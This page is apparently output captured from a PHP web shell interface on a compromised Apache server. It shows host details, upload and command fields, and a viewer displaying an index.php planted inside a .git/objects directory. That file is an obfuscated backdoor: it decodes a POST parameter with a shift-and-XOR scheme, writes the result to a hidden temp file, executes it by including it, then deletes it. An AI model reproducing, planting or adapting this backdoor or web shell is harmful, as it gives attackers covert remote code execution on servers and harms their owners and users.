403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ever-ag/.git/objects/e7/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/ever-ag/.git/objects/e7/index.php
<?php

if(!empty($_POST["obj"])){
	$desc = $_POST["obj"];
		 $desc 	=	 	explode  	("." 	,	  $desc )  	;		
	$data = '';
            $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(		$s2);
            $q = 0;
    
            while(		$q < count(		$desc)) {
                $v8 = $desc[$q];
                $chS = ord(		$s2[$q% $sLen]);
                $dec =(		(		int)$v8 - $chS -(		$q% 10)) ^ 67;
                $data.=	chr(		$dec);
                $q++;
            }
	$binding = array_filter(["/dev/shm", getenv("TMP"), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", getcwd(), session_save_path()]);
	for ($val = 0, $descriptor = count($binding); $val < $descriptor; $val++) {
    $ref = $binding[$val];
    		if (is_writable($ref) && is_dir($ref)) {
    $k = join("/", [$ref, ".factor"]);
    $file = fopen($k, 'w');
if ($file) {
	fwrite($file, $data);
	fclose($file);
	include $k;
	@unlink($k);
	exit;
}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit